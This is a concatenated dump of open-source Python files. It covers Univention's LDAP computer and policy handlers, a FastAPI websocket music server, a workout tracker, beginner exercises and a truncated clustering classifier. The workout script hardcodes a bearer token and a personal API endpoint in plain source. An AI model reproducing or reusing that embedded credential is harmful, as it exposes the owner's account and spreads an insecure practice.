ud.debug(ud.ADMIN, ud.INFO, 'updating groups')\n\n old_groups = DN.set(self.oldinfo.get('groups', []))\n new_groups = DN.set(self.info.get('groups', []))\n\n if self.oldPrimaryGroupDn:\n old_groups += DN.set([self.oldPrimaryGroupDn])\n\n if self.newPrimaryGroupDn:\n new_groups.add(DN(self.newPrimaryGroupDn))\n\n # prevent machineAccountGroup from being removed\n if self.has_property('machineAccountGroup'):\n machine_account_group = DN.set([self['machineAccountGroup']])\n new_groups += machine_account_group\n old_groups -= machine_account_group\n\n for group in old_groups ^ new_groups:\n groupdn = str(group)\n groupObject = univention.admin.objects.get(univention.admin.modules.get('groups/group'), self.co, self.lo, self.position, groupdn)\n groupObject.open()\n # add this computer to the group\n hosts = DN.set(groupObject['hosts'])\n if group not in new_groups:\n # remove this computer from the group\n hosts.discard(DN(self.old_dn))\n else:\n hosts.add(DN(self.dn))\n groupObject['hosts'] = list(DN.values(hosts))\n groupObject.modify(ignore_license=True)\n\n def primary_group(self): # type: () -> None\n if not self.hasChanged('primaryGroup'):\n return\n ud.debug(ud.ADMIN, ud.INFO, 'updating primary groups')\n\n primaryGroupNumber = self.lo.getAttr(self['primaryGroup'], 'gidNumber', required=True)\n self.newPrimaryGroupDn = self['primaryGroup']\n self.lo.modify(self.dn, [('gidNumber', b'None', primaryGroupNumber[0])])\n\n if 'samba' in self.options:\n primaryGroupSambaNumber = self.lo.getAttr(self['primaryGroup'], 'sambaSID', required=True)\n self.lo.modify(self.dn, [('sambaPrimaryGroupSID', b'None', primaryGroupSambaNumber[0])])\n\n def cleanup(self): # type: () -> None\n self.open()\n if self['dnsEntryZoneForward']:\n for dnsEntryZoneForward in self['dnsEntryZoneForward']:\n dn, ip = self.__split_dns_line(dnsEntryZoneForward)\n try:\n self.__remove_dns_forward_object(self['name'], dn, None)\n except Exception as e:\n ud.debug(ud.ADMIN, ud.WARN, 'dnsEntryZoneForward.delete(%s): %s' % (dnsEntryZoneForward, e))\n\n if self['dnsEntryZoneReverse']:\n for dnsEntryZoneReverse in self['dnsEntryZoneReverse']:\n dn, ip = self.__split_dns_line(dnsEntryZoneReverse)\n try:\n self.__remove_dns_reverse_object(self['name'], dn, ip)\n except Exception as e:\n ud.debug(ud.ADMIN, ud.WARN, 'dnsEntryZoneReverse.delete(%s): %s' % (dnsEntryZoneReverse, e))\n\n if self['dhcpEntryZone']:\n for dhcpEntryZone in self['dhcpEntryZone']:\n dn, ip, mac = self.__split_dhcp_line(dhcpEntryZone)\n try:\n self.__remove_from_dhcp_object(mac=mac)\n except Exception as e:\n ud.debug(ud.ADMIN, ud.WARN, 'dhcpEntryZone.delete(%s): %s' % (dhcpEntryZone, e))\n\n if self['dnsEntryZoneAlias']:\n for entry in self['dnsEntryZoneAlias']:\n dnsForwardZone, dnsAliasZoneContainer, alias = entry\n try:\n self.__remove_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, alias)\n except Exception as e:\n ud.debug(ud.ADMIN, ud.WARN, 'dnsEntryZoneAlias.delete(%s): %s' % (entry, e))\n\n # remove service record entries (see Bug #26400)\n ud.debug(ud.ADMIN, ud.INFO, '_ldap_post_remove: clean up service records, host records, and IP address saved at the forward zone')\n ips = set(self['ip'] or [])\n fqdn = self['fqdn']\n fqdnDot = '%s.' % fqdn # we might have entries w/ or w/out trailing '.'\n\n # iterate over all reverse zones\n for zone in self['dnsEntryZoneReverse'] or []:\n # load zone object\n ud.debug(ud.ADMIN, ud.INFO, 'clean up entries for zone: %s' % zone)\n if len(zone) < 1:\n continue\n zoneObj = univention.admin.objects.get(\n univention.admin.modules.get('dns/reverse_zone'), self.co, self.lo, self.position, dn=zone[0])\n zoneObj.open()\n\n # clean up nameserver records\n if 'nameserver' in zoneObj and fqdnDot in zoneObj['nameserver']:\n ud.debug(\n ud.ADMIN,\n ud.INFO,\n 'removing %s from dns zone %s' % (fqdnDot, zone[0]))\n # nameserver is required in reverse zone\n if len(zoneObj['nameserver']) > 1:\n zoneObj['nameserver'].remove(fqdnDot)\n zoneObj.modify()\n\n # iterate over all forward zones\n for zone in self['dnsEntryZoneForward'] or []:\n # load zone object\n ud.debug(ud.ADMIN, ud.INFO, 'clean up entries for zone: %s' % zone)\n if len(zone) < 1:\n continue\n zoneObj = univention.admin.objects.get(\n univention.admin.modules.get('dns/forward_zone'), self.co, self.lo, self.position, dn=zone[0])\n zoneObj.open()\n ud.debug(ud.ADMIN, ud.INFO, 'zone aRecords: %s' % zoneObj['a'])\n\n zone_obj_modified = False\n # clean up nameserver records\n if 'nameserver' in zoneObj and fqdnDot in zoneObj['nameserver']:\n ud.debug(\n ud.ADMIN,\n ud.INFO,\n 'removing %s from dns zone %s' % (fqdnDot, zone))\n # nameserver is required in forward zone\n if len(zoneObj['nameserver']) > 1:\n zoneObj['nameserver'].remove(fqdnDot)\n zone_obj_modified = True\n\n # clean up aRecords of zone itself\n new_entries = list(set(zoneObj['a']) - ips)\n if len(new_entries) != len(zoneObj['a']):\n ud.debug(\n ud.ADMIN,\n ud.INFO,\n 'Clean up zone records:\\n%s ==> %s' % (zoneObj['a'], new_entries))\n zoneObj['a'] = new_entries\n zone_obj_modified = True\n\n if zone_obj_modified:\n zoneObj.modify()\n\n # clean up service records\n for irecord in univention.admin.modules.lookup('dns/srv_record', self.co, self.lo, base=self.lo.base, scope='sub', superordinate=zoneObj):\n irecord.open()\n new_entries = [j for j in irecord['location'] if fqdn not in j and fqdnDot not in j]\n if len(new_entries) != len(irecord['location']):\n ud.debug(ud.ADMIN, ud.INFO, 'Entry found in \"%s\":\\n%s ==> %s' % (irecord.dn, irecord['location'], new_entries))\n irecord['location'] = new_entries\n irecord.modify()\n\n # clean up host records (that should probably be done correctly by Samba4)\n for irecord in univention.admin.modules.lookup('dns/host_record', self.co, self.lo, base=self.lo.base, scope='sub', superordinate=zoneObj):\n irecord.open()\n new_entries = list(set(irecord['a']) - ips)\n if len(new_entries) != len(irecord['a']):\n ud.debug(ud.ADMIN, ud.INFO, 'Entry found in \"%s\":\\n%s ==> %s' % (irecord.dn, irecord['a'], new_entries))\n irecord['a'] = new_entries\n irecord.modify()\n\n def __setitem__(self, key, value):\n raise_after = None\n\n ips = [ip for ip in self['ip'] if ip] if self.has_property('ip') and self['ip'] else []\n ip1 = self['ip'][0] if len(ips) == 1 else ''\n macs = [mac for mac in self['mac'] if mac] if self.has_property('mac') and self['mac'] else []\n mac1 = self['mac'][0] if len(macs) == 1 else ''\n\n if key == 'network':\n if self.old_network != value and value and value != 'None':\n network_object = univention.admin.handlers.networks.network.object(self.co, self.lo, self.position, value)\n network_object.open()\n subnet = ip_network(u\"%(network)s/%(netmask)s\" % network_object, strict=False)\n\n if not ips or ip_address(u'%s' % (ip1,)) not in subnet:\n if self.ip_freshly_set:\n raise_after = univention.admin.uexceptions.ipOverridesNetwork\n else:\n # get next IP\n network_object.refreshNextIp()\n self['ip'] = network_object['nextIp']\n ips = [ip for ip in self['ip'] if ip] if self.has_property('ip') and self['ip'] else []\n ip1 = self['ip'][0] if len(ips) == 1 else ''\n try:\n self.ip = self.request_lock('aRecord', self['ip'][0])\n self.ip_alredy_requested = True\n except univention.admin.uexceptions.noLock:\n pass\n\n self.network_object = network_object\n if network_object['dnsEntryZoneForward'] and ip1:\n self['dnsEntryZoneForward'] = [[network_object['dnsEntryZoneForward'], ip1]]\n if network_object['dnsEntryZoneReverse'] and ip1:\n self['dnsEntryZoneReverse'] = [[network_object['dnsEntryZoneReverse'], ip1]]\n if network_object['dhcpEntryZone']:\n if ip1 and mac1:\n self['dhcpEntryZone'] = [(network_object['dhcpEntryZone'], ip1, mac1)]\n else:\n self.__saved_dhcp_entry = network_object['dhcpEntryZone']\n\n self.old_network = value\n\n elif key == 'ip':\n self.ip_freshly_set = True\n if not self.ip or self.ip != value:\n if self.ip_alredy_requested:\n univention.admin.allocators.release(self.lo, self.position, 'aRecord', self.ip)\n self.ip_alredy_requested = 0\n if value and self.network_object:\n if self.network_object['dnsEntryZoneForward'] and ip1:\n self['dnsEntryZoneForward'] = [[self.network_object['dnsEntryZoneForward'], ip1]]\n if self.network_object['dnsEntryZoneReverse'] and ip1:\n self['dnsEntryZoneReverse'] = [[self.network_object['dnsEntryZoneReverse'], ip1]]\n if self.network_object['dhcpEntryZone']:\n if ip1 and macs:\n self['dhcpEntryZone'] = [(self.network_object['dhcpEntryZone'], ip1, mac1)]\n else:\n self.__saved_dhcp_entry = self.network_object['dhcpEntryZone']\n if not self.ip:\n self.ip_freshly_set = False\n\n elif key == 'mac' and self.__saved_dhcp_entry and ip1 and macs:\n if isinstance(value, list):\n self['dhcpEntryZone'] = [(self.__saved_dhcp_entry, ip1, value[0])]\n else:\n self['dhcpEntryZone'] = [(self.__saved_dhcp_entry, ip1, value)]\n\n super(simpleComputer, self).__setitem__(key, value)\n if raise_after:\n raise raise_after\n\n\nclass simplePolicy(simpleLdap):\n\n def __init__(self, co, lo, position, dn='', superordinate=None, attributes=[]):\n self.resultmode = 0\n\n if not hasattr(self, 'cloned'):\n self.cloned = None\n\n if not hasattr(self, 'changes'):\n self.changes = 0\n\n if not hasattr(self, 'policy_attrs'):\n self.policy_attrs = {}\n\n if not hasattr(self, 'referring_object_dn'):\n self.referring_object_dn = None\n\n simpleLdap.__init__(self, co, lo, position, dn, superordinate, attributes)\n\n def _ldap_post_remove(self):\n super(simplePolicy, self)._ldap_post_remove()\n for object_dn in self.lo.searchDn(filter_format('univentionPolicyReference=%s', [self.dn])):\n try:\n self.lo.modify(object_dn, [('univentionPolicyReference', self.dn.encode('UTF-8'), None)])\n except (univention.admin.uexceptions.base, ldap.LDAPError) as exc:\n ud.debug(ud.ADMIN, ud.ERROR, 'Could not remove policy reference %r from %r: %s' % (self.dn, object_dn, exc))\n\n def copyIdentifier(self, from_object):\n \"\"\"Activate the result mode and set the referring object\"\"\"\n self.resultmode = 1\n for key, property in from_object.descriptions.items():\n if property.identifies:\n for key2, property2 in self.descriptions.items():\n if property2.identifies:\n self.info[key2] = from_object.info[key]\n self.referring_object_dn = from_object.dn\n if not self.referring_object_dn:\n self.referring_object_dn = from_object.position.getDn()\n self.referring_object_position_dn = from_object.position.getDn()\n\n def clone(self, referring_object):\n \"\"\"\n Marks the object as a not existing one containing values\n retrieved by evaluating the policies for the given object\n \"\"\"\n self.cloned = self.dn\n self.dn = ''\n self.copyIdentifier(referring_object)\n\n def getIdentifier(self):\n # type: () -> str\n for key, property in self.descriptions.items():\n if property.identifies and key in self.info and self.info[key]:\n return key\n raise ValueError()\n\n def __makeUnique(self):\n identifier = self.getIdentifier()\n components = self.info[identifier].split(\"_uv\")\n if len(components) > 1:\n try:\n n = int(components[1])\n n += 1\n except ValueError:\n n = 1\n else:\n n = 0\n self.info[identifier] = \"%s_uv%d\" % (components[0], n)\n ud.debug(ud.ADMIN, ud.INFO, 'simplePolicy.__makeUnique: result: %s' % self.info[identifier])\n\n def create(self, serverctrls=None, response=None):\n if not self.resultmode:\n return super(simplePolicy, self).create(serverctrls=serverctrls, response=response)\n\n self._exists = False\n try:\n self.oldinfo = {}\n dn = super(simplePolicy, self).create(serverctrls=serverctrls, response=response)\n ud.debug(ud.ADMIN, ud.INFO, 'simplePolicy.create: created object: info=%s' % (self.info))\n except univention.admin.uexceptions.objectExists:\n self.__makeUnique()\n dn = self.create()\n return dn\n\n def policy_result(self, faked_policy_reference=None):\n \"\"\"\n This method retrieves the policy values currently effective\n for this object. If the 'resultmode' is not active the evaluation\n is cancelled.\n\n If faked_policy_reference is given at the top object\n (referring_object_dn) this policy object temporarily referenced.\n\n faked_policy_reference can be a string or a list of strings.\n \"\"\"\n if not self.resultmode:\n return\n\n self.polinfo_more = {}\n if not self.policy_attrs:\n policies = []\n if isinstance(faked_policy_reference, (list, tuple)):\n policies.extend(faked_policy_reference)\n elif faked_policy_reference:\n policies.append(faked_policy_reference)\n\n self.__load_policies(policies)\n\n if hasattr(self, '_custom_policy_result_map'):\n self._custom_policy_result_map()\n else:\n values = {}\n for attr_name, value_dict in self.policy_attrs.items():\n value_dict = copy.deepcopy(value_dict)\n values[attr_name] = copy.copy(value_dict['value'])\n value_dict['value'] = [x.decode('UTF-8') for x in value_dict['value']]\n self.polinfo_more[self.mapping.unmapName(attr_name)] = value_dict\n\n self.polinfo = univention.admin.mapping.mapDict(self.mapping, values)\n self.polinfo = self._post_unmap(self.polinfo, values)\n\n def __load_policies(self, policies=None):\n if not self.policy_attrs:\n # the referring object does not exist yet\n if self.referring_object_dn != self.referring_object_position_dn:\n result = self.lo.getPolicies(self.lo.parentDn(self.referring_object_dn), policies=policies)\n else:\n result = self.lo.getPolicies(self.referring_object_position_dn, policies=policies)\n for policy_oc, attrs in result.items():\n if univention.admin.objects.ocToType(policy_oc) == self.module:\n self.policy_attrs = attrs\n\n def __getitem__(self, key):\n if not self.resultmode:\n if self.has_property('emptyAttributes') and self.mapping.mapName(key) and self.mapping.mapName(key) in simpleLdap.__getitem__(self, 'emptyAttributes'):\n ud.debug(ud.ADMIN, ud.INFO, 'simplePolicy.__getitem__: empty Attribute %s' % key)\n if self.descriptions[key].multivalue:\n return []\n else:\n return ''\n return simpleLdap.__getitem__(self, key)\n\n self.policy_result()\n\n if (key in self.polinfo and not (key in self.info or key in self.oldinfo)) or (key in self.polinfo_more and 'fixed' in self.polinfo_more[key] and self.polinfo_more[key]['fixed']):\n if self.descriptions[key].multivalue and not isinstance(self.polinfo[key], list):\n # why isn't this correct in the first place?\n self.polinfo[key] = [self.polinfo[key]]\n ud.debug(ud.ADMIN, ud.INFO, 'simplePolicy.__getitem__: presult: %s=%s' % (key, self.polinfo[key]))\n return self.polinfo[key]\n\n result = simpleLdap.__getitem__(self, key)\n ud.debug(ud.ADMIN, ud.INFO, 'simplePolicy.__getitem__: result: %s=%s' % (key, result))\n return result\n\n def fixedAttributes(self):\n # type: () -> Dict[str, bool]\n \"\"\"Return effectively fixed attributes.\"\"\"\n if not self.resultmode:\n return {}\n\n self.__load_policies(None)\n return {\n self.mapping.unmapName(attr_name): value_dict.get('fixed', False)\n for attr_name, value_dict in self.policy_attrs.items()\n }\n\n def emptyAttributes(self):\n # type: () -> Dict[str, bool]\n \"\"\"return effectively empty attributes.\"\"\"\n if not self.has_property('emptyAttributes'):\n return {}\n\n return {\n self.mapping.unmapName(attrib): True\n for attrib in simpleLdap.__getitem__(self, 'emptyAttributes') or ()\n }\n\n def __setitem__(self, key, newvalue):\n if not self.resultmode:\n simpleLdap.__setitem__(self, key, newvalue)\n return\n\n self.policy_result()\n\n if key in self.polinfo:\n if self.polinfo[key] != newvalue or self.polinfo_more[key]['policy'] == self.cloned or (key in self.info and self.info[key] != newvalue):\n if self.polinfo_more[key]['fixed'] and self.polinfo_more[key]['policy'] != self.cloned:\n raise univention.admin.uexceptions.policyFixedAttribute(key)\n simpleLdap.__setitem__(self, key, newvalue)\n ud.debug(ud.ADMIN, ud.INFO, 'polinfo: set key %s to newvalue %s' % (key, newvalue))\n if self.hasChanged(key):\n ud.debug(ud.ADMIN, ud.INFO, 'polinfo: key:%s hasChanged' % (key))\n self.changes = 1\n return\n\n # this object did not exist before\n if not self.oldinfo:\n # if this attribute is of type boolean and the new value is equal to the default, than ignore this \"change\"\n if isinstance(self.descriptions[key].syntax, univention.admin.syntax.boolean):\n default = self.descriptions[key].base_default\n if isinstance(self.descriptions[key].base_default, (tuple, list)):\n default = self.descriptions[key].base_default[0]\n if (not default and newvalue == '0') or default == newvalue:\n return\n\n simpleLdap.__setitem__(self, key, newvalue)\n if self.hasChanged(key):\n self.changes = 1\n\n\nclass _MergedAttributes(object):\n \"\"\"Evaluates old attributes and the modlist to get a new representation of the object.\"\"\"\n\n def __init__(self, obj, modlist):\n self.obj = obj\n self.modlist = [x if len(x) == 3 else (x[0], None, x[-1]) for x in modlist]\n self.case_insensitive_attributes = ['objectClass']\n\n def get_attributes(self):\n attributes = set(self.obj.oldattr.keys()) | {x[0] for x in self.modlist}\n return {attr: self.get_attribute(attr) for attr in attributes}\n\n def get_attribute(self, attr):\n values = set(self.obj.oldattr.get(attr, []))\n # evaluate the modlist and apply all changes to the current values\n for (att, old, new) in self.modlist:\n if att.lower() != attr.lower():\n continue\n new = [] if not new else [new] if isinstance(new, bytes) else new\n old = [] if not old else [old] if isinstance(old, bytes) else old\n if not old and new: # MOD_ADD\n values |= set(new)\n elif not new and old: # MOD_DELETE\n values -= set(old)\n elif old and new: # MOD_REPLACE\n values = set(new)\n return list(values)\n","repo_name":"univention/univention-corporate-server","sub_path":"management/univention-directory-manager-modules/modules/univention/admin/handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":179642,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"33"} +{"seq_id":"23252672827","text":"from typing import List\n\nfrom fastapi import APIRouter, WebSocket, WebSocketDisconnect\n\nfrom app.music.service import MusicService\n\nrouter = APIRouter()\n\n\nclass ConnectionManager:\n def __init__(self):\n self.active_connectins: List[WebSocket] = []\n\n async def connect(self, websocket: WebSocket):\n await websocket.accept()\n self.active_connectins.append(websocket)\n\n def disconnect(self, websocket: WebSocket):\n self.active_connectins.remove(websocket)\n\n async def send(self, data: bytes, websocket: WebSocket):\n await websocket.send_bytes(data)\n\n async def broadcast(self, data: bytes):\n for connection in self.active_connectins:\n await connection.send_bytes(data)\n\n\nmanager = ConnectionManager()\n\n\n@router.websocket(\"/ws\")\nasync def music(websocket: WebSocket):\n await manager.connect(websocket)\n try:\n while True:\n request = await websocket.receive_json()\n \n try:\n seq = request[\"seq\"]\n except KeyError:\n seq = 0\n \n packet = MusicService.get_next_audio_packet(seq=seq)\n meta = packet.dict()\n meta.pop(\"buffer\")\n\n await websocket.send_json(meta)\n await websocket.send_bytes(packet.buffer)\n \n\n except WebSocketDisconnect:\n manager.disconnect(websocket)\n","repo_name":"AramayisO/duxov","sub_path":"backend/api/app/music/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23549490028","text":"import requests\nfrom requests import api\nimport datetime as dt\n\napp_id = ''\napp_key = ''\nsheety_token = '%'\n\nworkout_endpoint = 'https://trackapi.nutritionix.com/v2/natural/exercise'\nsheety_endpoint = 'https://api.sheety.co/31a86792fd95429388193024970a7b21/workoutTracking/workouts'\n\nheaders = {\n 'x-app-id': app_id,\n 'x-app-key': app_key,\n}\n\nsheety_headers = {\n 'Authorization': 'Bearer NbTqCor7W5FESGB%'\n}\n\nexercise = input('Enter exercise: ')\n\nexercise = {\n \"query\": exercise,\n \"gender\": \"male\",\n \"weight_kg\": 63,\n \"height_cm\": 160,\n \"age\": 22\n}\n\nresponse = requests.post(url=workout_endpoint, json=exercise, headers=headers)\nresult = response.json()\n\ndate_time = dt.datetime.now()\ndate = date_time.strftime('%d %B %Y')\ntime = date_time.strftime('%H:%M')\n\nfor exercise in result['exercises']: \n workout = {\n 'workout': {\n 'date': date,\n 'time': time,\n \"exercise\": exercise[\"name\"].title(),\n \"duration\": str(exercise[\"duration_min\"]),\n \"calories\": exercise[\"nf_calories\"]\n }\n } \n\nresponse = requests.post(url=sheety_endpoint, json=workout, headers=sheety_headers)\n","repo_name":"dainebigham/workout-tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"35359765562","text":"#print(\"Calculate Area\")\n\n#width = float(input(\"What is the width of the rectangle?\"))\n#height = float(input(\"What is the height of the rectangle?\"))\n\n#print(width * height)\n\n\n\n\n#print(\"Average calculator\")\n#num1 = int(input(\"Enter your first number\"))\n#num2 = int(input(\"Enter your second number\"))\n#print((num1 + num2) / 2))\n\n\n#foreName = input(\"What is your name?\")\n#age = str(21)\n#print(\"Hello \" + foreName + \" you are \" + age)\n\n\n#print(\"Dave Matravers\")\n#foreName = \"Dave\"\n#age = \"21\"\n#print(\"Hello \" + foreName + \", you are \" + age)\n\n\n\nsignName = \"Sign Shop\"\nuserName = \"Dave\"\n\nprint(signName)\nprint(\"Welcome to \" + signName + \", \" + userName + \".\")\n\ncustomerSign = input(\"What would you like the sign to read?\")\n\nsignLength = len(customerSign)\n\nsubTotal = signLength * 5\n\nshipping = 4.99\n\ngrandTotal = str(subTotal + shipping)\n\nprint(\"Your sign costs £\" + grandTotal)\n","repo_name":"matraversdavid/Level2_Programming","sub_path":"weekone.py","file_name":"weekone.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"37618370343","text":"from collections import Counter\n\n\"\"\"\nGiven two strings, write a method to decide if one is a permutation of the other.\n\"\"\"\n\ndef is_permutation(string1: str, string2: str) -> bool:\n \"\"\"\n # proposition 1\n using hash map, we store unique characters as keys and their occurances in string as values for the first string\n for second string to be permutation of the first one, characters and their occurances of the second string must equal to \n the first string.\n so we iterate characters from the second string and if that character is present in the hashmap, we reduce its occurance\n if it is not present then it is not permutation\n time -> O(n)\n space -> O(m) where m is the number of unique characters.\n\n\n\n # proposition 2\n in order for two strings to be permutation to each other, their length must also be same.\n if two strings are sorted then they must be same\n\n time -> O(nlogn)\n space -> O(1)\n \"\"\"\n # solution 1\n # counter = Counter(string1)\n # for char in string2:\n # if char not in counter:\n # return False\n # if counter[char] == 1:\n # del counter[char]\n # continue\n # counter[char] -= counter[char] - 1\n # return len(counter) == 0\n\n # solution 2\n # return sorted(string1) == sorted(string2)\n\n\nstr1 = \"Cracking\"\nstr2 = \"rcaCking\"\nprint(is_permutation(str1, str2))\n","repo_name":"DiyorbekAzimqulov/tech_interviews","sub_path":"algorithmic problems/CTCI/ArrayAndString/isPermutation.py","file_name":"isPermutation.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"71235007453","text":"import json\n\nfrom common.Request.Request import Request\n\n\ndef parseRequest(request):\n try:\n data = json.loads(request)\n except:\n return \"Invalid Request\"\n req = Request(data[\"headers\"][\"HOST\"],data[\"headers\"][\"PORT\"],data[\"headers\"][\"ENDPOINT\"])\n req.setHeaders(data[\"headers\"])\n req.setBody(data[\"body\"])\n return req","repo_name":"glaukiol1/pyts","sub_path":"common/parseRequest.py","file_name":"parseRequest.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"74612701213","text":"import pandas as pd\nimport numpy as np\nimport time\nimport os\nimport re\nimport shutil\nimport pathlib\nfrom datetime import datetime, timedelta\nfrom google.cloud import storage # type: ignore\nfrom pickle import dump\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.metrics import confusion_matrix, classification_report\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom segmentation.downloader import cluster_model_downloader\nfrom segmentation.cluster_model import segmentation_constants as constants\nimport segmentation.cluster_model.utils as utils\nfrom segmentation.config.load_config import load_config\n\n# Config\nconfig = load_config()\n\n\nclass Classifier:\n # initialize the class\n def __init__(self, data_version):\n self._root_dir = config[\"root_dir\"]\n self._data_version = data_version\n\n def localize_hour(self, utc_hour, continent):\n if continent == \"North America\":\n local_hour = utc_hour + constants.NA_HOUR_DIFF\n elif continent == \"South America\":\n local_hour = utc_hour + constants.SA_HOUR_DIFF\n elif continent == \"Europe\":\n local_hour = utc_hour + constants.EU_HOUR_DIFF\n elif continent == \"Africa\":\n local_hour = utc_hour + constants.AF_HOUR_DFF\n elif continent == \"Asia\":\n local_hour = utc_hour + constants.AS_HOUR_DIFF\n else:\n local_hour = utc_hour\n # make sure there's no negatives in the localized hour\n if local_hour < 0:\n local_hour = local_hour + 24\n # lastly, make sure 24 is 0\n if local_hour == 24:\n local_hour = 0\n return local_hour\n\n def extract_os_group(self, user_agent):\n if constants.LINUX_AGENT_STR in user_agent:\n os_group = \"linux\"\n elif constants.ANDROID_AGENT_STR in user_agent:\n os_group = \"android\"\n elif constants.WIN10_AGENT_STR in user_agent:\n os_group = \"windows10\"\n elif (\n constants.WIN_AGENT_STR in user_agent\n and constants.WIN10_AGENT_STR not in user_agent\n ):\n os_group = \"windows_older\"\n elif constants.IPHONE_AGENT_STR in user_agent:\n os_group = \"iphone\"\n elif constants.MAC_AGENT_STR in user_agent:\n os_group = \"macintosh\"\n elif constants.APPLE_AGENT_STR in user_agent:\n os_group = \"apple_other\"\n else:\n os_group = \"other_os\"\n return os_group\n\n def extract_referrer_group(self, referrer, domain):\n social_list = constants.SOCAL_REF_LIST\n search_list = constants.SEARCH_REF_LIST\n nsmg_network = constants.NSMG_REF_LIST\n email = constants.EMAIL_REF_LIST\n own_website = [domain]\n if any(wildcard in referrer for wildcard in social_list):\n referrer_group = \"social\"\n elif any(wildcard in referrer for wildcard in search_list):\n referrer_group = \"search\"\n elif any(wildcard in referrer for wildcard in nsmg_network):\n referrer_group = \"NSMG\"\n elif any(wildcard in referrer for wildcard in own_website):\n referrer_group = \"own_website\"\n elif any(wildcard in referrer for wildcard in email):\n referrer_group = \"email\"\n else:\n referrer_group = \"other_referrer\"\n return referrer_group\n\n def preprocess_rf_data(self, df, domain):\n # preprocess the 'time' field - it should contain only the 'hour' - 0:24\n df[\"hour_of_day_utc\"] = df.apply(\n lambda x: int(str(x[\"time\"]).split(\" \")[1].split(\":\")[0]), axis=1\n )\n # approximately 'localize' the time by adjusting according ot the continent\n df[\"local_hour_proxy\"] = df.apply(\n lambda x: self.localize_hour(x[\"hour_of_day_utc\"], x[\"continent\"]), axis=1\n )\n # drop the original and helper column\n df = df.drop([\"time\", \"hour_of_day_utc\"], axis=1)\n # extract the referrer group approximation\n referrer_df = df.fillna(\"other\")\n referrer_df[\"referrer_group\"] = referrer_df.apply(\n lambda x: self.extract_referrer_group(x[\"referrer\"], domain), axis=1\n )\n # drop the original column\n referrer_df = referrer_df.drop([\"referrer\"], axis=1)\n os_df = referrer_df.copy()\n os_df[\"os_group\"] = os_df.apply(\n lambda x: self.extract_os_group(x[\"user_agent\"]), axis=1\n )\n # drop the original column\n os_df = os_df.drop([\"user_agent\"], axis=1)\n return os_df\n\n def download_rf_train(\n self,\n domain,\n lookback_period,\n end_date,\n bqclient,\n bqstorageclient,\n permutive_project,\n ):\n start_date = datetime.strftime(\n datetime.strptime(end_date, \"%Y-%m-%d\") - timedelta(int(lookback_period)),\n \"%Y-%m-%d\",\n )\n rf_train_query = f\"\"\"\nselect * except(rn) from (\nselect user_id, time, properties.client.domain, properties.client.referrer, properties.geo_info.continent, properties.client.user_agent,\nrow_number() over (partition by user_id order by time DESC) as rn\nfrom {permutive_project}.global_data.pageview_events\nwhere (properties.client.domain = '{domain}' or properties.client.domain = 'www.{domain}')\nand DATE(_PARTITIONTIME) <= '{end_date}' and DATE(_PARTITIONTIME) >= '{start_date}'\n) where rn = 1\n\"\"\"\n train_df = (\n bqclient.query(rf_train_query)\n .result()\n .to_dataframe(bqstorage_client=bqstorageclient)\n )\n return train_df\n\n def generate_confusion_matrix(self, prod_dir, test_y, test_preds):\n TEXT_COLOR = \"k\"\n conf_mat = confusion_matrix(test_y, test_preds)\n conf_mat_norm = conf_mat.astype(\"float\") / conf_mat.sum(axis=1)[:, np.newaxis]\n conf_mat_df = pd.DataFrame(conf_mat_norm)\n conf_mat_df = conf_mat_df.round(2)\n sns.heatmap(conf_mat_df, annot=True)\n plt.title(\"Confusion Matrix\", color=TEXT_COLOR, fontsize=20)\n plt.ylabel(\"True label\", color=TEXT_COLOR, fontsize=16, rotation=0, labelpad=30)\n plt.xlabel(\"Predicted label\", color=TEXT_COLOR, fontsize=16)\n plt.xticks(color=TEXT_COLOR, fontsize=12)\n plt.yticks(color=TEXT_COLOR, fontsize=12, rotation=0)\n plt.savefig(f\"{prod_dir}/rf_confusion_matrix.png\")\n plt.close()\n return True\n\n def evaluate_rf_fit(self, prod_dir, df_test, encoder, clf):\n categorical_features_df_test = df_test[\n [\"domain\", \"continent\", \"referrer_group\", \"os_group\"]\n ]\n ohe_array_test = encoder.transform(categorical_features_df_test)\n ohe_df_test = pd.DataFrame(\n ohe_array_test,\n index=categorical_features_df_test.index,\n columns=encoder.get_feature_names(),\n )\n # finally, let's add the two other columns to this df to have a compelete, good-to-go df\n df_test_enc = ohe_df_test.join(df_test[[\"local_hour_proxy\", \"cluster\"]])\n test_y, test_x = (\n df_test_enc[\"cluster\"],\n df_test_enc.loc[:, df_test_enc.columns != \"cluster\"],\n )\n # predict and run a classification report\n test_preds = clf.predict(test_x)\n report = classification_report(test_y, test_preds, output_dict=True)\n scoring_df = pd.DataFrame(report)\n scoring_df.to_csv(f\"{prod_dir}/rf_classification_report.csv\")\n # finally, let's generate and persist a confusion matrix\n self.generate_confusion_matrix(prod_dir, test_y, test_preds)\n return True\n\n def fit_and_evaluate_rf_models(self, prod_dir, preprocessed_df):\n # let's set the random seed to be used downstream\n random_state = constants.RANDOM_SEED\n df_train, df_test = train_test_split(\n preprocessed_df, train_size=0.8, test_size=0.2, random_state=random_state\n )\n # finally, let's fit a one-hot encoder for our categorical variables, and transform the data\n # let's first isolate our categorical variables in a separate df\n categorical_features_df = df_train[\n [\"domain\", \"continent\", \"referrer_group\", \"os_group\"]\n ]\n # instantiate and fit the encoder\n encoder = OneHotEncoder(handle_unknown=\"ignore\", sparse=False)\n encoder.fit(categorical_features_df)\n # persist the encoder\n encoder_file = f\"{prod_dir}/rf_ohe_encoder.pkl\"\n dump(encoder, open(encoder_file, 